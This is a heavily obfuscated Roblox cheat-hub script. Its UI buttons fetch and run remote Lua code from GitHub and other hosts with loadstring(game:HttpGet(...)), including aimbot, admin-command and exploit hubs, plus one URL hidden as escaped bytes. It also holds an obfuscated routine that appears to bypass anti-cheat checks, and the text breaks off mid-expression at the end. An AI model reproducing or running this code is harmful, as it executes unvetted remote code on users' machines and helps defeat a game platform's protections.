--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v41={};for v104=1, #v8 do v6(v41,v0(v4(v1(v2(v8,v104,v104 + 1 )),v1(v2(v9,1 + ((v104-1)% #v9) ,1 + ((v104-1)% #v9) + 1 )))%256 ));end return v5(v41);end local v10=string.char;local v11=string.byte;local v12=string.sub;local v13=bit32 or bit ;local v14=v13.bxor;local v15=table.concat;local v16=table.insert;local function v17(v18,v19)local v42=0 -0 ;local v43;while true do local v105=1021 -(240 + 781) ;while true do if (v105==0) then if (v42==(0 + 0)) then v43={};for v114=598 -(265 + 332) , #v18 do v16(v43,v10(v14(v11(v12(v18,v114,v114 + 1 + 0 )),v11(v12(v19,1 + ((v114-(2 -1))% #v19) ,1 + ((v114-(122 -(114 + 7)))% #v19) + 1 )))%(777 -521) ));end v42=1 + 0 ;end if (v42==1) then return v15(v43);end break;end end end end print(v7("\46\12\164\237\240\15\15\246\208\139\90\40\174\227\219\15\25\179\226","\122\109\214\134\184"));local v20=loadstring(game:HttpGet("https://raw.githubusercontent.com/dawid-scripts/UI-Libs/main/fluxlib.txt"))();local v21=v20:Window(v7("\63\51\207\215\35\39\223","\107\82\189\188"),v7("\73\211","\31\224\222\179\236\118\26\135"),Color3.fromRGB(43 + 2 + 55 ,(3030 -(1180 + 136)) -(422 + 566 + (1812 -(717 + 438))) ,(148 -48) + 67 ),Enum.KeyCode.LeftControl);local v22=v21:Tab(v7("\60\202\30\121","\113\171\119\23\125\208\98"),"http://www.roblox.com/asset/?id=6023426915");v20:Notification(v7("\233\193\193\49\95\207\137\204\48\95\138\147\128\27\89\138\193\207\48\92\138\218\197\60\76\195\198\206\127\89\196\205\128\50\89\192\198\210\127\90\223\206\128\57\81\210\204\211\113","\170\169\160\95\56"),v7("\214\232\239\196\224\233\232\213","\149\135\129\176"));v22:Button(v7("\248\138\167\255\120\92\20\230\206\229","\174\187\135\171\25\46\127"),v7("\50\166\88\228\31\34\163\147\15\189\29\176\21\53\177\212\9\186\89\182\29\55","\102\206\61\196\116\71\218\179"),function()local v44=0 + 0 ;local v45;local v46;while true do if (v44==(1148 -(684 + 463))) then while true do if (v45==0) then v46=0 -0 ;while true do if (v46==(0 -(0 -0))) then v20:Notification(v7("\51\20\213\229\115\219\6\20\218\234\111\136\5\25\211\229\99\220\5\5\152","\96\97\182\134\22\168"),v7("\25\44\17\52\22\52\42\26","\90\67\127\64\99"));loadstring(game:HttpGet("https://raw.githubusercontent.com/tark-w/script/main/tark%20hub",true))();break;end end break;end end break;end if (v44==(1377 -(442 + 935))) then v45=0 + 0 ;v46=nil;v44=1 + 0 ;end end end);v22:Button(v7("\61\209\120\62\15\76\5\194\30\129","\107\227\88\106\110\62\110\138"),v7("\21\13\24\213\136\70\54","\94\104\97\185\237\53\69"),function()local v47=1871 -(1299 + 572) ;local v48;while true do if (v47==(1217 -(543 + 674))) then v48=91 -(81 + 10) ;while true do if (v48==(1500 -(1443 + 57))) then v20:Notification(v7("\119\35\89\68\135\87\48\79\75\142\93\118\95\95\135\71\35\78\66\134\10","\36\86\58\39\226"),v7("\100\19\70\81\158\246\250\66","\39\124\40\37\235\152\147"));loadstring(game:HttpGet("https://raw.githubusercontent.com/tark-w/script/main/TarkHubV3",true))();break;end end break;end end end);v22:Label(v7("\143\174\29\61\138\188\169\16\98\138\161\178\89\121\203\186\165\87\49\252\251\239","\200\193\121\17\170"));v22:Label(v7("\56\2\160\173\237\59\76\12\174\177\166\61\31\3\175\164\166\28\13\24\170\139\243\42\66","\108\106\193\195\134\72"));v22:Line();v22:Button(v7("\156\207\186\184","\202\135\207\218\111\235\224\173"),v7("\208\165\249\160\133\247\184\241\186\192\228\165\244\246\149\246\174\246\163\140\171","\133\203\144\214\224"),function()v20:Notification(v7("\247\32\61\174\58\89\145\53\59\226\58\69\212\34\33\182\58\29\231\9\33\160\115\29\226\46\38\176\38\28","\177\65\84\194\95\61"),v7("\83\44\180\252\217\225\83\117","\16\67\218\136\172\143\58"));end);v22:Button(v7("\200\186\95","\142\214\38\36\108\225"),v7("\237\52\21\162\215\58\14\162\210\50\14\227\216\55\25\162\214\62\64\227\152\123\2\235\198\63\95","\180\91\96\130"),function()local v49=0 + 0 ;local v50;while true do if ((0 + 0)==v49) then v50=0 + 0 + 0 + 0 ;while true do if (v50==((588 + 747) -(185 + 799 + 351))) then v20:Notification(v7("\127\39\1\190\51\52\253\89\62\14\164\118\34\227\73\49\23\169\51\35\181","\44\82\98\221\86\71\155"),v7("\30\239\168\222\245\41\52\229","\93\128\198\170\128\71"));loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")();break;end end break;end end end);v22:Button(v7("\13\239\45\82\189\38\21\127\32\244\32\71\233\29\21","\78\135\76\38\157\114\103\30"),"Herhalde bunu okuyamadığın için lazım...",function()local v51=0 + 0 ;local v52;while true do if (v51==(0 -0)) then v52=(1254 -751) -((170 -(12 + 28)) + 34 + 339) ;while true do if (v52==((1854 -(1433 + 421)) -(0 -0))) then v20:Notification(v7("\244\86\11\126\94\83\193\86\4\113\66\0\194\91\13\126\78\84\194\71\70","\167\35\104\29\59\32"),v7("\120\243\208\246\7\85\245\219","\59\156\190\130\114"));loadstring(game:HttpGetAsync("https://i.qts.life/r/ChatInlineTranslator.lua",true))();break;end end break;end end end);v22:Button(v7("\229\199\205\114\226\181\158\199\229","\162\151\152\82\177\212\232"),v7("\146\234\92\76\22\30\31","\199\153\57\42\99\51\32"),function()v20:Notification(v7("\244\94\143\195\195\209\193\94\128\204\223\130\194\83\137\195\211\214\194\79\194","\167\43\236\160\166\162"),v7("\122\94\88\170\93\181\212\92","\57\49\54\222\40\219\189"));_G.ShowUp=true;loadstring(game:HttpGet("https://raw.githubusercontent.com/Empire4946/roblox-gpu-saverBETTER/main/handler/main.txt"))();end);v22:Button(v7("\155\64\40\220\86\26\166","\213\37\92\176\51\105"),v7("\146\251\237\243\166\241\254\189\189\249\254\167\177\240\191\160\183\230\246\163\160\231\177","\212\148\159\211"),function()local v53=0 -0 ;local v54;while true do if (v53==(0 + 0)) then v54=0 + (1643 -(1249 + 394)) ;while true do if (v54==(1 + 0 + 0)) then local v106=0;local v107;while true do if (v106==0) then v107=0;while true do if (v107==(1251 -(470 + 780))) then v54=(5 -3) + 0 ;break;end if ((0 + 0)==v107) then Senti_IiiiIiIiIiiIiIIiIIiIie=Senti_IiiiIiIiIiiIiIIiIIiIie or nil ;Senti_IiiiIiIiIiiIiIIiIIiIid=Senti_IiiiIiIiIiiIiIIiIIiIid or Instance.new(v7("\4\226\249\217\189\161","\87\129\139\176\205\213")) ;v107=1 + 0 ;end end break;end end end if (v54==((33 + 117) -((107 -31) + (360 -286)))) then v20:Notification(v7("\117\210\85\82\194\85\193\67\93\203\95\135\83\73\194\69\210\66\84\195\8","\38\167\54\49\167"),v7("\138\114\169\33\82\47\89\172","\201\29\199\85\39\65\48"));_G[v17("\78\12\212\227\208\66\32\211\254\208\84\0\243\254\240\116\0\243\254\240\84\0\243\222\208\84\0\229","\29\105\186\151\185")]=function(v108,v109)if (v108~=nil) then local v121=0 -0 ;local v122;while true do if (v121==0) then v122=193 -(92 + 101) ;while true do if (v122==(2 -1)) then local v206=0;local v207;while true do if (v206==(863 -(515 + 348))) then v207=0 -0 ;while true do if (v207==(0 + 0)) then if (v7("\33\45\133\0\13","\73\72\233\108\98")==v7("\229\92\5\228\171\95\69\170\222\18\11\223\229\92\123","\157\106\61\156")) then print(v7("\228\185\120\31\227\234\190\61\74\233\236\165\61\94\186\231\170\121\31\255\253\187\113\80\243\241\244","\133\203\29\63\154"));end return true;end end break;end end end if (v122==0) then if (v109>( -(2 + 0) +  -(60 -19) + (1067 -(683 + 111 + 271)) + (697 -(137 + 488)) + 56 + 39 +  -((2140 -(1986 + 10)) -53) + (75 -(127 -82)))) then print("you're usin fps unlock");end if Senti_IiiiIiIiIiiIiIIiIIiIie then print(v7("\251\124\222\71\247\96\194\9\162\96\210\9\227\99\216\2\172\112\196\9\229\97\202\19\247\127\202\19\235\124\197\20\170\90\139\15\227\101\206\71\236\124\139\14\230\118\202\71\245\123\202\19\162\103\196\71\241\114\210\78","\130\19\171\103"));end v122=1078 -(805 + 272) ;end end break;end end elseif (v108==nil) then return true;else return;end end;v54=(2 -1) -(1154 -(566 + 588)) ;end if ((1258 -(170 + 81 + 1003))==v54) then return xpcall(function(v110,v111)local v115=562 -(71 + 491) ;local v116;local v117;local v118;local v119;local v120;while true do if (v115==(494 -(132 + 362))) then v116=v120;v117=v118;v120,v118=nil,nil;v115=(1213 + 489) -((1897 -(123 + 347)) + (741 -467)) ;end if (v115==((1535 -(412 + 1109)) -(28 -18))) then local v161=0 + 0 ;while true do if (v161==(0 + 0)) then v119={};v119[((2 -1) -((939 -(821 + 98))/100)) + (0.2 -0) ]=v116();v161=1;end if (v161==(2 -1)) then v119[(2 -((10 + 10)/((385 -230) -(90 -35)))) + (0.2 -0) + (0 -0) ]=v119[1190 -(469 + 720) ][v120.index];v115=1963 -(1749 + 209) ;break;end end end if (v115==((1 + 0) -(0 -0))) then local v162=0;while true do if (v162==1) then v118={};v115=(2929 -(554 + 834)) -((1793 -(873 + 99)) + 718) ;break;end if (v162==(0 -0)) then table.clear(v116());v117={};v162=1;end end end if (v115==((3 + 0) -1)) then v118.number=((1347 -((1938 -(1322 + 174)) + 169 + 671)) -((4 + 16)/(130 -30))) + 0.2 ;v119=getmetatable(newproxy(true));v120=getmetatable(setmetatable({},{}));v115=3 + 0 ;end if (v115==(2 + 3)) then v119[(((22 -15) -(5 -1)) -(((29 -19) + 10)/(23 + 77))) + (0.2 -0) ]=v117;v119[(((2398 -638) -((1276 -(84 + 610)) + (2746 -1572))) -((1 + (1380 -(1286 + 75)))/((2201 -(1068 + 814)) -219))) + 0.2 + (773 -(115 + 658)) ]="[['{\167;\176;\179;\97;\170;\109;\183;\97;\170;\175;\97;\175;\166;\185;\181;\109;\97;\168;\162;\174;\166;\123;\136;\166;\181;\148;\166;\179;\183;\170;\164;\166;\105;\99;\145;\173;\162;\186;\166;\179;\180;\99;\106;\111;\141;\176;\164;\162;\173;\145;\173;\162;\186;\166;\179;\111;\132;\169;\162;\179;\162;\164;\181;\166;\179;\123;\136;\166;\181;\133;\166;\180;\164;\166;\175;\165;\162;\175;\181;\180;\105;\106;\97;\165;\176;\78;\75;\170;\167;\97;\183;\123;\138;\180;\130;\105;\99;\131;\162;\180;\166;\145;\162;\179;\181;\99;\106;\97;\162;\175;\165;\97;\183;\111;\143;\162;\174;\166;\97;\191;\126;\99;\137;\182;\174;\162;\175;\176;\170;\165;\147;\176;\176;\181;\145;\162;\179;\181;\99;\97;\181;\169;\166;\175;\97;\78;\75;\168;\162;\174;\166;\123;\136;\166;\181;\148;\166;\179;\183;\170;\164;\166;\105;\99;\147;\182;\175;\148;\166;\179;\183;\170;\164;\166;\99;\106;\111;\137;\166;\162;\179;\181;\163;\166;\162;\181;\123;\164;\176;\175;\175;\166;\164;\181;\105;\167;\182;\175;\164;\181;\170;\176;\175;\105;\106;\78;\75;\183;\111;\151;\166;\173;\176;\164;\170;\181;\186;\97;\126;\97;\151;\166;\164;\181;\176;\179;\116;\111;\175;\166;\184;\105;\110;\115;\118;\111;\119;\109;\113;\109;\113;\106;\78;\75;\166;\175;\165;\106;\78;\75;\168;\162;\174;\166;\123;\136;\166;\181;\148;\166;\179;\183;\170;\164;\166;\105;\99;\147;\182;\175;\148;\166;\179;\183;\170;\164;\166;\99;\106;\111;\137;\166;\162;\179;\181;\163;\166;\162;\181;\123;\164;\176;\175;\175;\166;\164;\181;\105;\167;\182;\175;\164;\181;\170;\176;\175;\105;\106;\78;\75;\184;\162;\170;\181;\105;\111;\113;\114;\106;\78;\75;\183;\111;\151;\166;\173;\176;\164;\170;\181;\186;\97;\126;\97;\151;\166;\164;\181;\176;\179;\116;\111;\175;\166;\184;\105;\113;\109;\113;\109;\113;\106;\78;\75;\166;\175;\165;\106;\78;\75;\166;\175;\165;\78;\75;\166;\175;\165;\78;\75;\78;\75;\168;\162;\174;\166;\123;\136;\166;\181;\148;\166;\179;\183;\170;\164;\166;\105;\99;\148;\181;\162;\179;\181;\166;\179;\136;\182;\170;\99;\106;\123;\148;\166;\181;\132;\176;\179;\166;\105;\99;\148;\166;\175;\165;\143;\176;\181;\170;\167;\170;\164;\162;\181;\170;\176;\175;\99;\109;\97;\188;\97;\78;\75;\149;\170;\181;\173;\166;\97;\126;\97;\99;\143;\176;\181;\170;\167;\170;\164;\162;\181;\170;\176;\175;\99;\124;\78;\75;\149;\166;\185;\181;\97;\126;\97;\99;\143;\166;\181;\173;\166;\180;\180;\97;\162;\164;\181;\170;\183;\162;\181;\166;\165;\157;\175;\132;\179;\166;\162;\181;\166;\165;\97;\163;\186;\97;\142;\170;\130;\170;\137;\180;\138;\180;\114;\115;\115;\119;\99;\124;\78;\75;\138;\164;\176;\175;\97;\126;\97;\99;\179;\163;\185;\181;\169;\182;\174;\163;\123;\112;\112;\181;\186;\177;\166;\126;\130;\180;\180;\166;\181;\103;\170;\165;\126;\118;\114;\113;\120;\114;\121;\115;\114;\114;\117;\103;\184;\126;\114;\118;\113;\103;\169;\126;\114;\118;\113;\99;\124;\78;\75;\133;\182;\179;\162;\181;\170;\176;\175;\97;\126;\97;\114;\119;\124;\190;\106;\78;\75;}']]";break;end if (v115==((2297 -(116 + 1409)) -(34 + 181 + 554))) then local v166=0 -0 ;while true do if (v166==(1505 -(227 + 1278))) then spawn(function()if v116() then local v210=0 + 0 ;while true do if (v210==(0 -0)) then wait();v119[(2 + 0) -(0 + 0) ](v119[986 -(705 + 278) ](v119[4]))();break;end end else return v7("\35\225\88\33\160","\65\136\44\66\200");end end);v200=function(v200)local v202=1142 -(429 + 713) ;local v203;local v204;local v205;while true do if (v202==(353 -(46 + 306))) then v205=nil;while true do if (v203==(857 -(738 + 119))) then v204="";v205=function(v211)return (v211:gsub(".",function(v212)if tonumber(v212) then return v212;else return "";end end));end;v203=1;end if (v203==(2 -1)) then for v213,v214 in next,string.split(v213,"\a") do local v215=417 -(185 + 232) ;local v216;local v213;while true do if (v215==(340 -(219 + 121))) then local v217=0 -0 ;while true do if (v217==1) then v215=1 + 0 ;break;end if ((0 -0)==v217) then v216=632 -((412 -(143 + 62)) + (1895 -(369 + 1101))) ;v213=nil;v217=1;end end end if (v215==(2 -1)) then while true do if (v216==0) then v213=tonumber(v205(v214));if (v213~=nil) then v204=v204   .. string.char(v213-v118.number ) ;elseif v214 then v204=v204   .. v214 ;end break;end end break;end end end return v204:sub((11 -7) + (0 -0) );end end break;end if ((0 + 0)==v202) then v203=0 -0 ;v204=nil;v202=1;end end end;v166=1;end if (v166==(484 -(78 + 405))) then v120.index=v136("[['{\173;\176;\162;\165;\180;\181;\179;\170;\175;\168;}']]");v115=(884 -637) -(73 + (574 -404)) ;break;end end end end end,function(v112)game:GetService(v7("\250\128\148\38\44\203\151\145\59\28\203","\174\229\231\82\127")):Fail("\n"   .. (script or Instance.new(v7("\149\49\181\22\213\234","\198\82\199\127\165\158\141"))):GetFullName()   .. v7("\181\183\160\91\71\116\44\246\170\179\90\2\127\111\244\177\225\77\21\105\32\231\229","\149\223\193\40\103\27\79")   .. v112 );end,getfenv,setfenv);end if (v54==(967 -(468 + 369 + 128))) then local v113=0 + 0 ;while true do if (v113==(25 -(5 + 20))) then Senti_IiiiIiIiIiiIiIIiIIiIic=game:GetService(v7("\252\242\72\42\195\219\252\89\36","\171\157\58\65\176")):GetRealPhysicsFPS();Senti_IiiiIiIiIiiIiIIiIIiIib=game:GetService(v7("\144\115\39\217\165\109\53","\192\31\70\160"))[v7("\243\62\192\94\22\195\27\51\198\52\209","\191\81\163\63\122\147\119\82")];v113=1;end if (v113==(1416 -(541 + 874))) then v54=2 + 1 + (122 -(37 + 85)) ;break;end end end if (v54==((17 -12) -(414 -(9 + 403)))) then Senti_IiiiIiIiIiiIiIIiIIiIia=Senti_IiiiIiIiIiiIiIIiIIiIi_(Senti_IiiiIiIiIiiIiIIiIIiIib,Senti_IiiiIiIiIiiIiIIiIIiIic);if ( not Senti_IiiiIiIiIiiIiIIiIIiIia==true) then return pcall(function()game:GetService(v7("\243\218\212\244\253\123\17\209\214\196\229","\167\191\167\128\174\30\99")):Fail(v7("\9\28\53\8\37\9\123\10\37\28\63\70\57\30\41\15\58\9","\74\125\91\102"));end);end v54=(7 -3) + 0 + 0 ;end end break;end end end);local v23=v21:Tab("Gui's","http://www.roblox.com/asset/?id=6023426915");v23:Button(v7("\126\221\199\202\229\75","\63\180\170\168\138"),v7("\153\172\172\208\110\94\154\62\248\191\166\216\121\66\206\72","\216\222\207\181\27\45\186\102"),function()local v55=0;local v56;while true do if (v55==(0 + 0)) then v56=0;while true do if (v56==((2031 -1497) -(1 + 6 + 527))) then v20:Notification(v7("\32\202\33\165\34\0\217\55\170\43\10\159\7\190\34\16\202\54\163\35\93","\115\191\66\198\71"),v7("\99\60\213\181\236\78\58\222","\32\83\187\193\153"));loadstring(game:HttpGet("https://raw.githubusercontent.com/SPDM-Team/ArceusX-V3-Scripts/main/ArceusX-Aimbot.lua"))();break;end end break;end end end);v23:Button(v7("\0\113\16\224\27\62\35\44\63\47\224\16\59\51\105","\73\31\118\137\117\87\87"),v7("\115\0\8\12\136\134\92\43\8\14\131\134\88\36\70\41\159\197","\53\69\40\77\236\235"),function()local v57=(2425 -1704) -((594 -240) + (750 -(51 + 332))) ;while true do if (v57==(0 + (0 -0))) then v20:Notification(v7("\182\86\192\180\193\235\171\111\137\79\218\247\193\224\168\121\144\87\198\179\138","\229\35\163\215\164\152\205\26"),v7("\237\43\178\101\219\42\181\116","\174\68\220\17"));loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))();break;end end end);v23:Button(v7("\247\24\243\65\131\48\233\68","\163\119\156\45"),v7("\107\50\125\200\118\211\191\64\44\97\135","\47\64\18\184\86\167\208"),function()local v58=1238 -(943 + 295) ;local v59;local v60;local v61;local v62;local v63;local v64;local v65;local v66;while true do if (v58==(752 -(648 + 102))) then v63=nil;v64=nil;v58=1 + 2 ;end if (v58==3) then v65=nil;v66=nil;v58=4;end if (v58==1) then v61=nil;v62=nil;v58=4 -2 ;end if (v58==4) then while true do if (v59==(7 -4)) then v66=nil;while true do if (v60==(1 -0)) then local v124=0;while true do if (v124==(1 + 0)) then v61.Parent=game.CoreGui;v61.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v124=2;end if (v124==(851 -(154 + 694))) then v60=3 -1 ;break;end if (v124==(0 + 0)) then v66=Instance.new(v7("\16\216\90\221\6\200\86\221\43\211","\68\189\34\169"));v61.Name=v7("\13\45\80\38\129\57\73\0","\73\95\63\86\161\126\28");v124=1562 -(1480 + 81) ;end if (v124==(953 -(125 + 826))) then local v176=0 + 0 ;while true do if (v176==0) then v62.Name=v7("\191\211\196\3","\210\178\173\109\128\232\53");v62.Parent=v61;v176=1 + 0 ;end if (v176==(1 -0)) then v124=3;break;end end end end end if (v60==8) then v65.TextColor3=Color3.fromRGB((182 -(74 + 108)) -(77 -(34 + 43)) ,0,0 + 0 );v65.TextScaled=true;v65.TextSize=2 + 1 + (1298 -(805 + 482)) ;v65.TextWrapped=true;v66.Name=v7("\124\44\13\126","\63\94\104\26\55\91");v66.Parent=v62;v60=9;end if (3==v60) then v63.Parent=v62;v63.BackgroundColor3=Color3.fromRGB(1956 -(983 + 718) ,580 -(158 + 422) ,0);v63.Position=UDim2.new((1810.0597826242 -(605 + 48)) -(877 + (701 -421)) ,(0 + 0) -(0 + 0) ,1751.119906127 -(763 + 988) ,0 -(0 + 0) );v63.Size=UDim2.new(602 -(198 + 404) ,(86 -39) + (15 -7) ,1120 -((888 -533) + 765) ,(92 + 39) -(1270 -(112 + 1077)) );v63.Font=Enum.Font.SourceSans;v63.Text=v7("\30\76\66\37","\90\62\45\85\175\160\95\85");v60=4 + 0 ;end if (v60==(4 + 3)) then local v138=0 + 0 ;while true do if (v138==0) then v65.Parent=v62;v65.BackgroundColor3=Color3.fromRGB((1164 -(240 + 55)) -(877 -(109 + 154)) ,0 + 0 + 0 ,0 + 0 + 0 );v138=1;end if (v138==(5 -2)) then v60=14 -6 ;break;end if ((1 -0)==v138) then v65.Position=UDim2.new(0 + 0 + (1570 -(959 + 611)) ,0 -(0 + 0) ,0.999885917,0 + 0 + (1749 -(1036 + 713)) );v65.Size=UDim2.new((0 -0) + 0 + 0 ,145 + 6 ,(0 -0) -0 ,16 + 18 );v138=5 -3 ;end if (v138==(1427 -(857 + 568))) then v65.Font=Enum.Font.SourceSans;v65.Text=v7("\137\170\58\224\253\176\161\104\162","\223\207\72\147\148");v138=8 -5 ;end end end if (v60==(525 -(48 + 477))) then local v139=0 -0 ;while true do if ((288 -(71 + 216))==v139) then v62=Instance.new(v7("\111\229\242\233\174","\41\151\147\132\203\102\24\120"));v63=Instance.new(v7("\128\180\85\14\29\2\172\160\190\67","\212\209\45\122\95\119\216"));v139=5 -3 ;end if (v139==(3 -0)) then v60=1552 -(697 + 854) ;break;end if (v139==(0 -0)) then v20:Notification(v7("\206\32\81\162\55\163\176\232\57\94\184\114\181\174\248\54\71\181\55\180\248","\157\85\50\193\82\208\214"),v7("\207\233\57\21\252\192\91\233","\140\134\87\97\137\174\50"));v61=Instance.new(v7("\226\76\19\8\231\26\131\243\216","\177\47\97\109\130\116\196\134"));v139=1182 -(38 + 1143) ;end if (v139==(2 + 0)) then v64=Instance.new(v7("\115\167\254\100\209\82\182\242\127\253","\39\194\134\16\147"));v65=Instance.new(v7("\176\24\181\109\205\187\74\144\18\163","\228\125\205\25\143\206\62"));v139=679 -(112 + 564) ;end end end if (v60==(777 -(769 + 2))) then v64.TextColor3=Color3.fromRGB((181 -(83 + 98)) + (0 -0) ,0 -(0 + 0) ,0 + 0 );v64.TextScaled=true;v64.TextSize=3 + (14 -3) ;v64.TextWrapped=true;v64.MouseButton1Down:Connect(function()game.Players.LocalPlayer.Backpack:FindFirstChildOfClass(v7("\1\201\80\16","\85\166\63\124\182\175\122")).Parent=game.Players.LocalPlayer.Character;end);v65.Name=v7("\129\34\107\14\69\34\240","\215\71\25\125\44\77\158\145");v60=2 + 5 ;end if ((3 + 1)==v60) then v63.TextColor3=Color3.fromRGB(0,398 -((538 -421) + 128 + 153) ,(3191 -1488) -(33 + 304 + (2494 -1128)) );v63.TextScaled=true;v63.TextSize=(92 + 1012) -(630 + (1282 -(224 + 598))) ;v63.TextWrapped=true;v63.MouseButton1Down:Connect(function()game.Players.LocalPlayer.Character:FindFirstChildOfClass(v7("\220\91\254\248","\136\52\145\148\40\48")).Parent=game.Workspace;end);v64.Name=v7("\214\206\224\61\245","\147\191\149\84\133\36");v60=1074 -(1029 + 40) ;end if (v60==2) then local v150=1007 -(424 + 583) ;while true do if ((0 + 0)==v150) then v62.BackgroundColor3=Color3.fromRGB((2733 -2027) -(77 + 28 + (1800 -(587 + 612))) ,0 -0 ,0);v62.Position=UDim2.new((1190.0809101239 + 278) -(1226 + (1730 -(157 + 1331))) ,(0 -0) + 0 ,0.203790441,0);v150=1;end if (v150==3) then v60=1 + 2 ;break;end if ((1 + 0)==v150) then v62.Size=UDim2.new((585 + 13) -((326 -114) + (777 -391)) ,1412 -(122 + (2608 -(958 + 510))) ,521 -(247 + 274) ,9 + 119 );v62.Active=true;v150=2;end if (v150==(2 -0)) then v62.Draggable=true;v63.Name=v7("\11\215\246\71\82\115\78\32\201","\79\165\153\55\114\39\33");v150=2 + 1 ;end end end if (v60==(1 + 4)) then local v151=0 -0 ;while true do if (v151==(0 + 0)) then v64.Parent=v62;v64.BackgroundColor3=Color3.fromRGB((3353 -2456) -(347 + 295) ,0 -0 ,0 + 0 );v151=1 + 0 ;end if ((3 -2)==v151) then v64.Position=UDim2.new((1804.55251956 -(1739 + 65)) -(0 + 0) ,1303 -(983 + 320) ,(114.11990608299999 + 52) -(10 + 4 + (581 -(396 + 33))) ,0 + 0 );v64.Size=UDim2.new(0 + 0 ,(333 -192) -83 ,0 + 0 + (0 -0) ,249 -(923 -(170 + 554)) );v151=1194 -(491 + 701) ;end if (v151==(1 + 1)) then v64.Font=Enum.Font.SourceSans;v64.Text=v7("\56\111\109\221\162","\125\30\24\180\210");v151=3;end if (v151==(1 + 2)) then v60=18 -12 ;break;end end end if ((956 -(834 + 113))==v60) then v66.BackgroundColor3=Color3.fromRGB((580 + 1253) -(123 + (2552 -(605 + 492))) ,(0 -0) -(1977 -(828 + 1149)) ,0 -(0 -0) );v66.Position=UDim2.new((1305 -(299 + 877)) -((1773 -(526 + 1241)) + 123) ,0, -(0.266169071 + 0),(1382 + 21) -(1189 + 60 + 119 + 35) );v66.Size=UDim2.new(0 + 0 + (0 -0) ,1 + 32 + 118 ,0 -0 ,417 -(201 + 182) );v66.Font=Enum.Font.SourceSans;v66.Text=v7("\119\175\26\14\59\120\183\94\31\122\104\165","\26\206\126\107\27");v66.TextColor3=Color3.fromRGB((1883 -(214 + 405)) -((2496 -(1215 + 379)) + (2034 -(871 + 801))) ,(2494 -(260 + 1101)) -((456 -(11 + 84)) + 149 + 623) ,(1415 -620) -(88 + 108 + (1423 -824)) );v60=16 -6 ;end if (v60==(1714 -(1020 + 684))) then v66.TextSize=(2334 -1345) -(569 + 406) ;v66.TextWrapped=true;break;end end break;end if (v59==(470 -(90 + 380))) then v60=0 + 0 ;v61=nil;v59=881 -(308 + 572) ;end if (v59==(1 + 0)) then v62=nil;v63=nil;v59=2 + 0 ;end if (v59==(4 -2)) then v64=nil;v65=nil;v59=1432 -(30 + 1399) ;end end break;end if ((1597 -(284 + 1313))==v58) then v59=0;v60=nil;v58=1896 -(102 + 1793) ;end end end);v23:Button(v7("\45\58\57\201\0","\122\95\80\167"),v7("\121\178\8\91\164\69\73\253\26\71\246\71\2","\61\221\109\40\132\44"),function()v20:Notification(v7("\68\2\175\255\198\225\165\73\123\27\181\188\198\234\166\95\98\3\169\248\141","\23\119\204\156\163\146\195\60"),v7("\4\248\252\90\4\171\205\95","\71\151\146\46\113\197\164\58"));loadstring(game:HttpGet("https://raw.githubusercontent.com/weiny-ez/w-main/main/loader.lua"))();end);v23:Button(v7("\205\115\236\52\238\217\244\114","\134\22\149\86\129\184"),v7("\153\47\112\5\250\224\151\16","\216\92\29\119\218\172"),function()local v67=0 -0 ;local v68;while true do if (v67==(0 + 0)) then v68=0 + 0 ;while true do if (v68==(389 -(117 + 272))) then v20:Notification(v7("\195\220\0\193\76\159\5\229\197\15\219\9\137\27\245\202\22\214\76\136\77","\144\169\99\162\41\236\99"),v7("\222\117\10\20\47\62\188\248","\157\26\100\96\90\80\213"));loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt",true))();break;end end break;end end end);v23:Button(v7("\220\103\222\78\69\41\84\197","\157\21\189\43\48\90\116"),v7("\10\238\109\233\246\164\41\251\113\187\186","\93\143\20\201\148\193"),function()local v69=0 + 0 ;local v70;while true do if (v69==(0 -0)) then v70=0;while true do if (v70==0) then v20:Notification(v7("\52\0\192\137\15\174\1\0\207\134\19\253\34\13\198\137\31\169\2\17\141","\103\117\163\234\106\221"),v7("\12\179\116\29\246\173\165\42","\79\220\26\105\131\195\204"));loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/chillz-workshop/main/Arceus%20X%20V3"))();break;end end break;end end end);v23:Button(v7("\252\27\177\205\203\84\158\205\204","\174\116\214\184"),v7("\159\16\171\237\255\49\201\184\8\166\248\172\108","\204\124\202\157\223\83\168"),function()local v71=0 + 0 ;local v72;while true do if (v71==0) then v72=594 -(234 + 360) ;while true do if (v72==(0 + 0)) then v20:Notification(v7("\60\212\14\135\94\89\168\26\3\205\20\196\94\82\171\12\26\213\8\128\21","\111\161\109\228\59\42\206\111"),v7("\61\243\119\72\18\15\32\27","\126\156\25\60\103\97\73"));loadstring(game:HttpGet("https://raw.githubusercontent.com/Kitzoon/Rogue-Hub/main/Main.lua",true))();break;end end break;end end end);v23:Button(v7("\226\214\15\221\67\136\199\222\65\241\67\134\146","\178\179\97\185\54\228"),v7("\194\183\176\245\175\179\177\233\250\188\167\168","\143\210\195\134"),function()local v73=615 -(345 + 